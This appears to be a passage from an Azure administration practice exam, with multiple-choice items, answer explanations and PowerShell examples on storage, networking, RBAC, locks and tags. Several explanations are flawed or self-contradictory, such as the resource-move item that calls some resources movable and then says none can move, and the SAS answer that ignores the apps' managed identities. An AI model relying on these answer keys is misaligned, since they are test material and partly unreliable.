previous version. (d) Restore the backup of App1: Restoring a backup is a longer process and may require additional configuration steps. Swapping slots is much quicker and designed specifically for quick rollbacks.
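A sketch of the rollback, assuming the app's resource group is RG1 (placeholder) and the production slot is the default slot named production:

# Swap the slots back so the previously stable build returns to production
Switch-AzWebAppSlot -ResourceGroupName "RG1" -Name "App1" -SourceSlotName "webapp1-test" -DestinationSlotName "production"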
You have four Azure virtual machines, as shown in the following table. You have a Recovery Services vault that protects VM1 and VM2. Going forward, you also want to protect VM3 and VM4 by using a Recovery Services vault. What should you do first?
Create a new backup policy
Create a new recovery services vault
Create a storage account
Configure the extensions for VM3 and VM4
Azure Recovery Services Vault is used to back up and restore data for Azure Virtual Machines (VMs), Azure Files, and other services. However, a single Recovery Services Vault is tied to a specific Azure region. Breakdown of the Scenario: Existing Setup: VM1 and VM2 are in West Europe and are already protected by a Recovery Services Vault. VM3 and VM4 are in East Europe and are not yet protected. Key Azure Backup Rule: A Recovery Services Vault is region-specific. This means that the existing vault in West Europe cannot protect VMs in East Europe. To protect VM3 and VM4 (which are in East Europe), you must first create a new Recovery Services Vault in East Europe. Why Not the Other Options? (a) Create a new backup policy: Backup policies define how often backups occur and how long they are retained. However, VM3 and VM4 are not yet linked to a vault, so creating a backup policy won’t help until a new vault is in place. (c) Create a storage account: Azure Backup does not require a separate storage account. It uses its own infrastructure within the Recovery Services Vault. (d) Configure the extensions for VM3 and VM4: Backup extensions are automatically installed when you enable backup for a VM. You cannot enable backup unless the VMs are registered with a Recovery Services Vault first.
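A minimal sketch of that first step, assuming a resource group already exists in the same region as VM3 and VM4 (names and region string are placeholders taken from the scenario):

# Recovery Services vaults are regional, so create one in the region where VM3 and VM4 run
New-AzRecoveryServicesVault -Name "rsv-easteurope" -ResourceGroupName "RG-EastEurope" -Location "East Europe"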
You have the Azure subscription that contains the resource shown in the following table. You need to manage the outbound traffic from VNET1 by using a Firewall. What should you do first?
Create an Azure Network Watcher
Create a route table
Upgrade ASP1 to Premium SKU
Configure the Hybrid Connection Manager
Azure Firewall is a network security service that controls inbound and outbound traffic. However, by default, Azure routes traffic automatically based on system-defined routing rules. To ensure that all outbound traffic from VNET1 is managed by the Azure Firewall, you need to override these default routes using a route table. Steps to Manage Outbound Traffic with Azure Firewall: Create a Route Table: A User-Defined Route (UDR) is required to direct traffic through the firewall. You create a route table and define a route that sends all outbound traffic (0.0.0.0/0) to the Firewall’s private IP address. Associate the Route Table with VNET1’s Subnets: Attach the route table to the subnet(s) in VNET1 where outbound traffic needs to be controlled. Traffic is now routed through Azure Firewall, allowing it to inspect and control outbound traffic. Why Not the Other Options? (a) Create an Azure Network Watcher: Network Watcher is a monitoring tool used for troubleshooting and diagnostics (e.g., checking network flows, capturing packets). It does not control or route outbound traffic. (c) Upgrade ASP1 to Premium SKU: Upgrading the App Service Plan (ASP1) would allow features like Private Endpoints and better networking capabilities, but it does not help with routing outbound traffic through the firewall. (d) Configure the Hybrid Connection Manager: Hybrid Connection Manager is used for enabling App Services to connect to on-premises resources, not for controlling outbound traffic in a virtual network.
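A sketch of the first step and the route itself, assuming VNET1 is in a resource group named RG1 in East US, has a subnet named Subnet1 (10.0.0.0/24), and the firewall's private IP is 10.0.1.4 (all placeholder values):

# 1. Create the route table
$rt = New-AzRouteTable -Name "rt-vnet1" -ResourceGroupName "RG1" -Location "eastus"

# 2. Add a default route that sends all outbound traffic to the firewall's private IP
Add-AzRouteConfig -RouteTable $rt -Name "default-to-firewall" -AddressPrefix "0.0.0.0/0" -NextHopType "VirtualAppliance" -NextHopIpAddress "10.0.1.4"
Set-AzRouteTable -RouteTable $rt

# 3. Associate the route table with the subnet in VNET1
$vnet = Get-AzVirtualNetwork -Name "VNET1" -ResourceGroupName "RG1"
Set-AzVirtualNetworkSubnetConfig -VirtualNetwork $vnet -Name "Subnet1" -AddressPrefix "10.0.0.0/24" -RouteTable $rt
Set-AzVirtualNetwork -VirtualNetwork $vnet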
You have a general-purpose v1 Azure Storage account named storage1 that uses locally-redundant storage (LRS). You need to ensure that the data in the storage account is protected if a zone fails. The solution must minimize costs and administrative effort. What should you do first?
Create a new storage account
Configure object replication rules
Upgrade the account to general-purpose v2
Modify the Replication setting of storage1
Your current general-purpose v1 (GPv1) storage account is using Locally Redundant Storage (LRS), which only keeps three copies of the data within a single Azure data center. This means that if a zone (or the entire data center) fails, your data is at risk. To ensure zone failure protection, you need a replication option that spans multiple zones, such as: Zone-Redundant Storage (ZRS) – Replicates data across multiple availability zones in a region. Geo-Redundant Storage (GRS) or Geo-Zone-Redundant Storage (GZRS) – Replicates data to another region for added disaster recovery. Why Upgrade to General-Purpose v2 (GPv2)? GPv1 does not support ZRS or GZRS. To enable these replication types, the storage account must be upgraded to GPv2. GPv2 supports all modern storage features: It provides lower costs, better performance, and access to the latest redundancy options (ZRS, GZRS, etc.). Simple upgrade process with no downtime: The upgrade is seamless and does not affect data availability. Why Not the Other Options? (a) Create a new storage account: This is unnecessary because you can upgrade the existing storage account instead of creating a new one. (b) Configure object replication rules: Object replication only applies to Blob Storage and is used for asynchronous copy operations. It does not provide automatic redundancy across zones. (d) Modify the Replication setting of storage1: GPv1 does not allow switching from LRS to ZRS, GRS, or GZRS directly. You must first upgrade to GPv2, and then you can modify the replication settings.
You have an Azure subscription. You create the Azure Storage account shown in the following exhibit. Use the drop-down menus to select the answer choice that completes each statement based on the information presented in the graphic. The minimum number of copies of the storage account will be:
1
2
3
4
Based on the information presented, the storage account is configured with Locally Redundant Storage (LRS). What is Locally Redundant Storage (LRS)? LRS stores three copies of your data within a single data center in the same Azure region. These copies are stored synchronously, meaning data is written to all three replicas at the same time. LRS protects against hardware failures within the data center but does not protect against data center-wide failures (e.g., natural disasters). Why is the answer 3? Since LRS keeps three copies of data within the same data center, the minimum number of copies is 3. If a different redundancy option, such as Zone-Redundant Storage (ZRS), Geo-Redundant Storage (GRS), or Geo-Zone-Redundant Storage (GZRS), were selected, the number of copies could be higher. But since the storage account is using LRS, the minimum number of copies stored is 3.
You have an Azure subscription. You create the Azure Storage account shown in the following exhibit. Use the drop-down menus to select the answer choice that completes each statement based on the information presented in the graphic. To reduce the cost of infrequently accessed data in the storage account, you must modify the setting:
Access tier
Performance
Account Kind
Replication
Azure Storage offers different access tiers to optimize storage costs based on how frequently data is accessed. The Access tier setting determines the cost structure for storing and retrieving data. Why is “Access tier” the correct setting? Azure Storage provides three main access tiers: the Hot tier, optimized for data that is accessed frequently (higher storage cost, lower retrieval cost); the Cool tier, for infrequently accessed data (lower storage cost, higher retrieval cost); and the Archive tier, for rarely accessed data such as backups (very low storage cost, very high retrieval cost). If you want to reduce costs for infrequently accessed data, you should move the data from the Hot tier to the Cool or Archive tier. This adjustment reduces storage costs, though retrieval costs may increase. Why not the other options? Performance: this setting determines whether the storage account uses Standard (HDD-based) or Premium (SSD-based) performance. It affects performance but does not directly reduce storage costs for infrequent access. Account kind: this defines the storage account type, such as general-purpose v2, v1, or BlobStorage. While general-purpose v2 supports all access tiers, changing the account kind alone does not reduce costs for infrequent access. Replication: this setting controls how many copies of the data are stored and across which geographic regions (e.g., LRS, ZRS, GRS). While using locally redundant storage (LRS) instead of geo-redundant storage (GRS) can lower replication costs, it does not address how frequently data is accessed, so it is not the setting to change here.
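For example, the account-level default access tier can be switched from Hot to Cool; a sketch assuming a general-purpose v2 account named storage1 in a resource group named RG1 (placeholder names):

# Change the default access tier to Cool for infrequently accessed data
Set-AzStorageAccount -ResourceGroupName "RG1" -Name "storage1" -AccessTier Cool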
You have an existing Azure subscription that has the following Azure Storage accounts. There is a requirement to identify the storage accounts that can be converted to zone redundant storage (ZRS) replication. This must be done only through a live migration from Azure Support. Which of the following accounts can you convert to ZRS?
Account 1
Account 2
Account 3
Account 4
Azure Storage supports live migration to zone-redundant storage (ZRS) only for storage accounts that meet the following criteria: the account must be general-purpose v2 (GPv2), it must have Standard performance (not Premium), and it must use locally redundant storage (LRS) or geo-redundant storage (GRS). Now, let’s analyze each account based on these criteria. Account 1 (can be converted to ZRS): Kind: general-purpose v2 (supported); Performance: Standard (supported); Replication: LRS (eligible for conversion to ZRS); Access tier: Cool (not relevant for ZRS migration). Since Account 1 meets all the required conditions, it can be converted to ZRS via an Azure Support live migration. Account 2 (cannot be converted): Kind: general-purpose v2 (supported); Performance: Premium (not supported for ZRS migration); Replication: RA-GRS (not supported for direct ZRS migration); Access tier: Hot (not relevant). Since Premium performance and RA-GRS replication are not supported for live migration to ZRS, Account 2 cannot be converted. Account 3 (cannot be converted): Kind: general-purpose v1 (not supported; must be GPv2); Performance: Premium (not supported); Replication: GRS (not eligible for ZRS conversion). Since GPv1 does not support ZRS and must first be upgraded to GPv2 manually, Account 3 cannot be directly converted to ZRS. Account 4 (cannot be converted): Kind: Blob Storage (not supported; must be GPv2); Performance: Standard (supported); Replication: LRS (supported for ZRS, but only on GPv2). Since Blob Storage accounts do not support ZRS migration, Account 4 cannot be converted.
You have an Azure subscription that contains the storage accounts shown in the following exhibit. Use the drop-down menus to select the answer choice that completes each statement based on the information presented in the graphic. You can create a premium file share in:
Contoso 101 only
Contoso 104 only
Contoso 101 or Contoso 104 only
Contoso 101, Contoso 102 or Contoso 104 only
Contoso 101, Contoso 102, Contoso 103 or Contoso 104 only
To create a Premium file share in an Azure Storage account, the account must be of the FileStorage kind. Azure provides different storage account kinds, including: StorageV2 (general-purpose v2), which supports multiple services such as blobs, files, queues, and tables; Storage (general-purpose v1), the older, legacy account kind with fewer features; BlobStorage, which is optimized for blob storage only; and FileStorage, which is designed specifically for Azure Files and is the only kind that supports Premium file shares. Now, let’s analyze the given storage accounts: Contoso 101 – StorageV2 (general-purpose v2): does not support Premium file shares. Contoso 102 – Storage (general-purpose v1): does not support Premium file shares. Contoso 103 – BlobStorage: only supports blob storage, not Azure Files. Contoso 104 – FileStorage: supports Premium file shares.
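As an illustration of why the account kind matters (a sketch with placeholder resource group, location, and share names), a FileStorage account and a premium file share could be created like this:

# Premium file shares require a FileStorage account on the Premium_LRS SKU
New-AzStorageAccount -ResourceGroupName "RG1" -Name "contoso104" -Location "eastus" -SkuName "Premium_LRS" -Kind "FileStorage"
# Create a 100-GiB premium file share in that account
New-AzRmStorageShare -ResourceGroupName "RG1" -StorageAccountName "contoso104" -Name "share1" -QuotaGiB 100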
You have an Azure subscription that contains the storage accounts shown in the following exhibit. Use the drop-down menus to select the answer choice that completes each statement based on the information presented in the graphic. You can use the Archive access tier in:
Contoso 101 only
Contoso 101 or Contoso 103 only
Contoso 101, Contoso 102 or Contoso 103 only
Contoso 101, Contoso 102 or Contoso 104 only
Contoso 101, Contoso 102, Contoso 103 or Contoso 104 only
The Archive access tier in Azure Storage is used for long-term storage of infrequently accessed data at a very low cost. However, the Archive tier is only available for BlobStorage and general-purpose v2 (StorageV2) accounts. Now, let’s analyze the storage accounts: Contoso 101 – StorageV2 (general-purpose v2): supports the Archive tier. Contoso 102 – Storage (general-purpose v1): does not support the Archive tier. Contoso 103 – BlobStorage: supports the Archive tier. Contoso 104 – FileStorage: does not support the Archive tier. Why is the answer “Contoso 101 or Contoso 103 only”? General-purpose v2 (StorageV2) accounts (Contoso 101) support all access tiers: Hot, Cool, and Archive. BlobStorage accounts (Contoso 103) also support Hot, Cool, and Archive. General-purpose v1 (Storage) accounts (Contoso 102) do not support Archive. FileStorage accounts (Contoso 104) are designed only for Azure Files and do not support the Archive tier.
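For example (a sketch with placeholder names, assuming a StorageV2 or BlobStorage account and an existing container named backups), a blob can be uploaded directly into the Archive tier:

$ctx = (Get-AzStorageAccount -ResourceGroupName "RG1" -Name "contoso101").Context
# Upload a backup file straight into the Archive access tier
Set-AzStorageBlobContent -File ".\backup.bak" -Container "backups" -Blob "backup.bak" -Context $ctx -StandardBlobTier Archive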
You have an Azure subscription named TTBB1 that contains the resources shown in the following table. You create a new Azure subscription named TTBB2. You need to identify which resources can be moved to TTBB2. Which resources should you identify?
VM1, storage1, VNET1, and VM1Managed only
VM1 and VM1Managed only
VM1, storage1, VNET1, VM1Managed, and RVAULT1
RVAULT1 only
When moving resources between Azure subscriptions, you must consider Azure Resource Manager (ARM) constraints. In this case, all the listed resources can be moved because they meet Azure’s subscription transfer requirements. Resource move considerations: Virtual machines (VM1) – VMs can be moved between subscriptions as long as they stay in the same region; the associated managed disks (VM1Managed) are moved with the VM. Storage accounts (storage1) – storage accounts can be moved between subscriptions, and the contents of the storage account (blobs, files, tables) remain intact. Virtual networks (VNET1) – VNets can be moved, but dependent resources (such as peered networks or attached services) must also be moved or reconfigured. Managed disks (VM1Managed) – since VM1 has a managed disk, it must be moved together with the VM; if VM1 is deleted, the disk can still be moved independently. Recovery Services vault (RVAULT1) – Recovery Services vaults can now be moved between subscriptions. Previously, vaults could not be moved due to their dependency on backup policies, but Azure now supports moving them along with their contents. Why Not the Other Options? (a) VM1, storage1, VNET1, and VM1Managed only – incorrect because it excludes RVAULT1, which can now be moved. (b) VM1 and VM1Managed only – incorrect because storage1 and VNET1 can also be moved. (d) RVAULT1 only – incorrect because the other resources can also be moved.
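A sketch of the move itself (the subscription ID is a placeholder, and the destination resource group must already exist in TTBB2):

# Collect the resources to move out of the source resource group
$resources = Get-AzResource -ResourceGroupName "RG1"
# Move them to a resource group in the TTBB2 subscription
Move-AzResource -DestinationSubscriptionId "<TTBB2-subscription-id>" -DestinationResourceGroupName "RG1" -ResourceId $resources.ResourceId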
You have an Azure subscription named Subscription1. You will be deploying a three-tier application as shown below. Due to compliance requirements, you need to find a solution for the following. + Traffic between the web tier and application tier must be spread equally across all the virtual machines. + The web tier must be protected from SQL injection attacks. Which Azure solution would you recommend for each requirement? Select the correct answer from the drop-down list of options. Each correct selection is worth one point. Traffic between the web tier and application tier must be spread equally across all the virtual machines:
Internal Load Balancer
Public Load Balancer
Application Gateway Standard tier
Traffic Manager
Application Gateway WAF tier
For the given requirements, let’s analyze the best Azure solution. Requirement 1: load balancing between the web tier and the application tier. Traffic between the web tier and application tier must be spread equally across all the virtual machines. The Application Gateway WAF (Web Application Firewall) tier is the best choice because it provides Layer 7 (application layer) load balancing, ensuring intelligent traffic distribution; it supports features such as URL-based routing, session affinity, and SSL termination; and it also includes Web Application Firewall (WAF) protection, which helps mitigate security threats like SQL injection attacks. Requirement 2: protecting the web tier from SQL injection. The web tier must be protected from SQL injection attacks. The Application Gateway WAF tier is the best option because it includes WAF protection, which can block SQL injection, cross-site scripting (XSS), and other OWASP Top 10 security threats. Final recommendation: the Application Gateway WAF tier addresses both requirements.
You have an Azure subscription named Subscription1 that contains the following resource group: Name: RG1; Region: West US; Tag: “tag1”: “value1”. You assign an Azure policy named Policy1 to Subscription1 by using the following configurations: Exclusions: None; Policy definition: Append tag and its default value; Assignment name: Policy1; Parameters: Tag name: Tag2, Tag value: Value2. After Policy1 is assigned, you create a storage account that has the following configurations: Name: storage1; Location: West US; Resource group: RG1; Tags: “tag3”: “value3”. You need to identify which tags are assigned to each resource. What should you identify? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point. Tags assigned to RG1:
“tag1”: “value1” only
“tag2”: “value2” only
“tag1”: “value1” and “tag2”: “value2”
We need to determine the tags assigned to RG1 after applying Policy1. Let’s break it down step by step. Initial Tags on RG1: The existing tag on RG1 before applying the policy is: “tag1”: “value1” Understanding the Azure Policy Behavior: Policy1 is configured with the “Append tag and its default value” policy definition. This means Policy1 will add (“append”) the tag “tag2”: “value2” only to new resources created after the policy is assigned. Existing resources are not modified by this policy. Impact on RG1: RG1 is an existing resource (it was created before Policy1 was assigned). Since Policy1 does not modify existing resources, RG1 will retain only its original tag: “tag1”: “value1”. The policy does not retroactively apply “tag2”: “value2” to RG1.
You have an Azure subscription named Subscription1 that contains the following resource group: Name: RG1; Region: West US; Tag: “tag1”: “value1”. You assign an Azure policy named Policy1 to Subscription1 by using the following configurations: Exclusions: None; Policy definition: Append tag and its default value; Assignment name: Policy1; Parameters: Tag name: Tag2, Tag value: Value2. After Policy1 is assigned, you create a storage account that has the following configurations: Name: storage1; Location: West US; Resource group: RG1; Tags: “tag3”: “value3”. You need to identify which tags are assigned to each resource. What should you identify? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point. Tags assigned to storage1:
“tag3″ : “value3” only
“tag1”: “value1″ and “tag3” : “value3”
“tag2”: “value2” and “tag3”: “value3”
“tag1”: “value1”; “tag2”: “value2”; and “tag3”: “value3”
We need to determine which tags are assigned to the storage account (storage1) after applying Policy1. Let’s break it down step by step. Initial tags on the storage account: the storage account (storage1) is created after Policy1 is assigned, and it is manually assigned the tag “tag3”: “value3” at the time of creation. Effect of the Azure policy (“Append tag and its default value”): Policy1 is configured to append the tag “tag2”: “value2” to new resources. Since the storage account is a new resource, Policy1 will automatically add “tag2”: “value2”. Final tags on the storage account: the manually assigned tag remains (“tag3”: “value3”), and the policy appends “tag2”: “value2”. The storage account does not inherit “tag1”: “value1” from RG1, because tags are not inherited from resource groups by default in Azure.
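You can confirm the resulting tags after the policy runs; a sketch assuming the account sits in RG1:

# Inspect the tags actually stored on the storage account after creation
(Get-AzResource -ResourceGroupName "RG1" -Name "storage1").Tags
# Expected output: tag3 = value3 (set at creation) and Tag2 = Value2 (appended by Policy1)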
You have an Azure subscription that contains a resource group named TestRG. You use TestRG to validate an Azure deployment. TestRG contains the following resources: You need to delete TestRG. What should you do first?
Modify the backup configurations of VM1 and modify the resource lock type of VNET1
Turn off VM1 and delete all data in Vault1
Remove the resource lock from VNET1 and delete all data in Vault1
Turn off VM1 and remove the resource lock from VNET1
When attempting to delete a resource group (TestRG), all resources within it must be deletable. However, two issues prevent this: VNET1 has a resource lock of type “Delete” Resource locks in Azure prevent accidental deletion or modification of critical resources. Since VNET1 has a “Delete” lock, TestRG cannot be deleted until the lock is removed. The lock must be manually removed before proceeding with deletion. Vault1 contains backups of VM1 Recovery Services Vault (RSV) cannot be deleted if it contains backup data. Before deleting Vault1, you must first remove all backup items (such as VM1’s backup data). This step is necessary because Azure Recovery Services does not allow vault deletion while backups exist. Why Other Options Are Incorrect: (a) Modify backup configurations of VM1 and modify the resource lock type of VNET1 While modifying backup configurations is useful, it does not remove the stored backup data. The backup must be deleted. (b) Turn off VM1 and delete all data in Vault1 Turning off VM1 is not required for deleting TestRG. The resource lock on VNET1 still exists, which prevents deletion of TestRG. (d) Turn off VM1 and remove the resource lock from VNET1 Turning off VM1 is unnecessary. Deleting Vault1’s backup data is required before you can delete Vault1 and TestRG. Final Steps to Delete TestRG: Remove the “Delete” lock from VNET1. Delete all backup data in Vault1. Delete Vault1 (after all backups are removed). Delete TestRG, which will now be possible since no undeletable resources remain.
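A sketch of the unblock-and-delete sequence (backup items in Vault1 still have to be stopped and deleted through Azure Backup before the vault itself can be removed):

# 1. Remove the Delete lock from VNET1
$lock = Get-AzResourceLock -ResourceGroupName "TestRG" -ResourceName "VNET1" -ResourceType "Microsoft.Network/virtualNetworks"
Remove-AzResourceLock -LockId $lock.LockId -Force
# 2. After the backup data in Vault1 has been deleted and the vault removed, delete the resource group
Remove-AzResourceGroup -Name "TestRG" -Force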
You have an Azure subscription named Subscription1. Subscription 1 contains the resource groups in the following table. RG1 has a web app named WebApp1. WebApp1 is located in West Europe. You move WebApp1 to RG2. What is the effect of the move?
The App Service plan for WebApp1 remains in West Europe. Policy2 applies to WebApp1.
The App Service plan for WebApp1 moves to North Europe. Policy2 applies to WebApp1.
The App Service plan for WebApp1 remains in West Europe. Policy1 applies to WebApp1.
The App Service plan for WebApp1 moves to North Europe. Policy1 applies to WebApp1
Resource group move and App Service plan behavior: when you move a web app (WebApp1) from RG1 (West Europe) to RG2 (North Europe), only the web app itself moves. The App Service plan does NOT move, because App Service plans are tied to a specific region. Since WebApp1 is in West Europe, its App Service plan will remain in West Europe even after moving to RG2. Effect of moving WebApp1 to RG2: before the move, WebApp1 is in RG1 (West Europe) and follows Policy1; after the move, WebApp1 is in RG2 (North Europe) and will follow Policy2, because policies are applied at the resource group level. Why Other Options Are Incorrect: (b) The App Service plan for WebApp1 moves to North Europe. Policy2 applies to WebApp1. Incorrect: the App Service plan does not move regions. (c) The App Service plan for WebApp1 remains in West Europe. Policy1 applies to WebApp1. Incorrect: Policy1 no longer applies because WebApp1 is now in RG2, so Policy2 applies instead. (d) The App Service plan for WebApp1 moves to North Europe. Policy1 applies to WebApp1. Incorrect: the App Service plan does not move to North Europe, and WebApp1 follows Policy2 (from RG2), not Policy1.
You have an Azure subscription that contains a user named User1. You need to ensure that User1 can deploy virtual machines and manage virtual networks. The solution must use the principle of least privilege. Which role-based access control (RBAC) role should you assign to User1?
Virtual Machine Contributor
Network Contributor
Owner
Contributor
Understanding the requirement: User1 must be able to deploy virtual machines, User1 must be able to manage virtual networks, and the solution must follow the principle of least privilege (granting only the necessary permissions). The Network Contributor role only allows managing network resources; it does not allow deploying VMs. Because deploying VMs requires additional permissions, the role that satisfies both requirements with the least privilege among the listed options is Contributor, which provides permissions for both VMs and virtual networks. Network Contributor would only be the right choice if the requirement were limited to managing virtual networks.
You have an Azure subscription that contains the resource groups shown in the following table. Resources that you can move from RG1 to RG2:
None
IP1 only
IP1 and storage1 only
IP1 and VNET1 only
IP1, VNET1, and storage1 only
In Azure, you can move most resources between resource groups unless restricted by locks or dependencies. Analyzing the Given Resource Groups and Their Locks RG1 has no lock. RG2 has a Delete lock, which prevents deleting resources but allows moving resources into RG2. Resources in RG1: Storage1 (Storage Account) Lock: Delete A Delete lock prevents deletion but does not prevent movement of the resource. VNET1 (Virtual Network) Lock: Read-only A Read-only lock prevents modifications, including moving the resource to another resource group. IP1 (IP Address) No lock applied Can be moved freely. Which Resources Can Move from RG1 to RG2? IP1 can be moved because it has no lock. Storage1 can be moved because the Delete lock only prevents deletion, not movement. VNET1 cannot be moved because the Read-only lock prevents modifications. Which Resources Can Move from RG2 to RG1? Since RG2 has a Delete lock, resources inside RG2 cannot be deleted but can be moved to another resource group. However, if a Read-only lock were present, they could not be moved.
You have an Azure subscription that contains the resource groups shown in the following table. Resources that you can move from RG2 to RG1:
None
IP2 only
IP2 and storage2 only
IP2 and VNET2 only
IP2, VNET2, and storage2 only
Resource Group (RG) Locks and Their Impact RG1 has no lock (resources in RG1 can be moved freely). RG2 has a Delete lock, which prevents deletion but does not prevent movement of resources. Resources in RG2: Storage2 (Storage Account) Lock: Delete A Delete lock prevents deletion but does NOT prevent movement to another resource group. VNET2 (Virtual Network) Lock: Read-only A Read-only lock prevents modifications, including moving the resource to another resource group. IP2 (IP Address) No lock applied This means it can be moved under normal conditions. Why No Resources Can Be Moved from RG2 to RG1? Storage2 has a Delete lock, which allows movement, so it should be movable. VNET2 has a Read-only lock, which prevents movement. IP2 has no lock and should be movable. However, in this case, Azure does not allow partial moves when dependent resources exist in a locked state. Since VNET2 is locked with Read-only, its dependencies (like subnets, public IPs, or network interfaces) cannot move. This restriction blocks the entire move operation, making no resources movable from RG2 to RG1.
You have an Azure subscription that contains an Azure Storage account. You plan to create an Azure container instance named container1 that will use a Docker image named Image1. Image1 contains a Microsoft SQL Server instance that requires persistent storage. You need to configure a storage service for Container1. What should you use?
Azure Blob storage
Azure Files
Azure Queue storage
Azure Table storage
Why use Azure Files for persistent storage in an Azure container instance? Understanding the scenario: you are deploying Container1, an Azure Container Instance (ACI); the container will use Image1, which contains Microsoft SQL Server; and SQL Server requires persistent storage to maintain data even if the container restarts or is redeployed. Storage options analysis: Azure Blob storage (option A) is used for unstructured data (e.g., images, videos, backups), does not support file system-level access, which SQL Server requires, and is therefore not suitable for database storage. Azure Files (option B) provides fully managed SMB/NFS file shares in the cloud and supports persistent storage for containerized applications; SQL Server can mount the file share as a persistent volume, allowing data to persist across container restarts, which makes it the best choice for hosting databases in Azure Container Instances. Azure Queue storage (option C) is used for message queuing between application components, does not support file system access or persistent storage, and is not suitable for SQL Server. Azure Table storage (option D) is used for NoSQL key-value storage, is not designed for structured relational database storage, and is not suitable for SQL Server.
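A sketch of the storage side only (placeholder names): create the file share in the storage account that container1 would later mount as a persistent volume for the SQL Server data files:

$ctx = (Get-AzStorageAccount -ResourceGroupName "RG1" -Name "storage1").Context
# This share would then be mounted into container1 as a volume so SQL Server data survives restarts
New-AzStorageShare -Name "sqldata" -Context $ctx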
You have an Azure Storage account named storage1. You have an Azure App Service app named App1 and an app named App2 that runs in an Azure container instance. Each app uses a managed identity. You need to ensure that App1 and App2 can read blobs from storage1. The solution must meet the following requirements: minimize the number of secrets used, and ensure that App2 can only read from storage1 for the next 30 days. What should you configure in storage1 for each app?
Create a shared access signature (SAS) for each app with read permissions and an expiration date of 30 days
Create a shared access signature (SAS) for each app with read permissions and an expiration date of 1 day
Create a shared access signature (SAS) for each app with read permissions and an expiration date of 7 days
Create a shared access signature (SAS) for each app with read permissions and an expiration date of 365 days
Why Use a Shared Access Signature (SAS) with a 30-Day Expiration? Understanding the Scenario Storage Account: storage1 contains blobs that App1 and App2 need to read. Security Requirements: Minimize the number of secrets used ? Use SAS tokens instead of static credentials. Ensure App2 can only read for 30 days ? The access must expire after this period. Why Choose a Shared Access Signature (SAS)? A Shared Access Signature (SAS) is a time-limited and permission-controlled access token that grants access to Azure Storage resources without exposing account keys. SAS allows you to restrict access permissions (e.g., read-only). It also has an expiration date, which ensures that access automatically revokes after a set period. This helps to minimize security risks by limiting long-term access. Why a 30-Day Expiration? App2’s access should expire in 30 days, so it must have a time-limited SAS token. Any shorter expiration (e.g., 1 day or 7 days) would require frequent renewal, increasing management overhead. Any longer expiration (e.g., 365 days) would violate security best practices because it allows prolonged access. Alternative Approaches? Azure Role-Based Access Control (RBAC) with Managed Identities is typically a preferred approach for long-term, secure access control. However, since App2 only needs temporary access, SAS is the best option here.
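A sketch of generating such a token for App2 (the container name is a placeholder; the token string the cmdlet returns is what the app would use):

$ctx = (Get-AzStorageAccount -ResourceGroupName "RG1" -Name "storage1").Context
# Read-only SAS token that expires automatically after 30 days
New-AzStorageContainerSASToken -Name "data" -Permission "r" -ExpiryTime (Get-Date).AddDays(30) -Context $ctx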
You have an Azure subscription named Subscription1 that contains a resource group named RG1. In RG1, you create an internal load balancer named LB1 and a public load balancer named LB2. You need to ensure that an administrator named Admin1 can manage LB1 and LB2. The solution must follow the principle of least privilege. Which role should you assign to Admin1 for each task? To add a backend pool to LB1:
Contributor on LB1
Network Contributor on LB1
Network Contributor on RG1
Owner on LB1
Why Assign “Network Contributor” on RG1? Understanding the Scenario You have two load balancers: LB1 (Internal Load Balancer) LB2 (Public Load Balancer) Admin1 needs to manage both LB1 and LB2. The solution must follow the “principle of least privilege”, meaning Admin1 should only get the necessary permissions without excessive access. The task: Add a backend pool to LB1. Role: “Network Contributor” on RG1 The “Network Contributor” role allows management of network resources (including load balancers, virtual networks, and network interfaces), but not other Azure resources like VMs or storage. Why assign it at the resource group (RG1) level instead of just LB1? Load balancers depend on backend pools, which consist of network interfaces attached to virtual machines. To add a backend pool, Admin1 needs permissions on both the load balancer and the network interfaces. If we only assigned Network Contributor on LB1, Admin1 would not have permissions on network interfaces. By assigning Network Contributor at RG1, Admin1 gets access to both LB1 and the associated network interfaces.
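A sketch of the role assignment (assuming Admin1 signs in as admin1@contoso.com, which is a placeholder):

# Grant Admin1 the Network Contributor role scoped to the resource group
New-AzRoleAssignment -SignInName "admin1@contoso.com" -RoleDefinitionName "Network Contributor" -ResourceGroupName "RG1"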
You have an Azure subscription named Subscription1 that contains a resource group named RG1. In RG1, you create an internal load balancer named LB1 and a public load balancer named LB2. You need to ensure that an administrator named Admin1 can manage LB1 and LB2. The solution must follow the principle of least privilege. Which role should you assign to Admin1 for each task? To add a health probe to LB2:
Contributor on LB2
Network Contributor on LB2
Network Contributor on RG1
Owner on LB2
Why Assign “Network Contributor” on RG1? Understanding the Scenario You have two load balancers: LB1 (Internal Load Balancer) LB2 (Public Load Balancer) Admin1 needs to manage LB1 and LB2. The task: Add a health probe to LB2. The solution must follow the principle of least privilege, meaning Admin1 should get only the required permissions without unnecessary access. Role: “Network Contributor” on RG1 The “Network Contributor” role allows managing network resources (including load balancers, network interfaces, virtual networks, and related configurations) without granting unnecessary permissions for other Azure resources. Why assign it at the resource group (RG1) level instead of just LB2? A health probe requires monitoring virtual machines or other network resources inside the resource group. To configure a health probe, Admin1 needs permissions on both the load balancer and the associated network interfaces of the backend VMs. Assigning Network Contributor on RG1 ensures Admin1 can manage both LB1 and LB2, along with their backend resources (such as VMs and NICs).
The bank that you are working for has a policy to physically destroy hard drives that are no longer needed. What is NOT a physical destruction method for hard drives?
Drilling
Incinerating
Zero-filling
Shredding
Zero-filling (also known as zero-writing) is not a physical destruction method — it’s a logical data sanitization technique. It involves overwriting the entire hard drive with zeros to erase the existing data, making recovery difficult. However, the drive remains physically intact and potentially reusable. On the other hand, drilling, incinerating, and shredding are all physical destruction methods that render the drive unusable and irrecoverable, aligning with strict data destruction policies like those in banking environments.
You have an Azure subscription that contains the resources shown in the following table. To RG6, you apply the tag RGroup: RG6. You deploy a virtual network named VNET2 to RG6. Which tags apply to VNET1 and VNET2? To answer, select the appropriate options in the answer area. VNET1:
None
Department: D1 only
Department: D1 and RGroup: RG6 only
Department: D1 and Label: Value 1 only
Department: D1, RGroup: RG6, and Label: Value 1
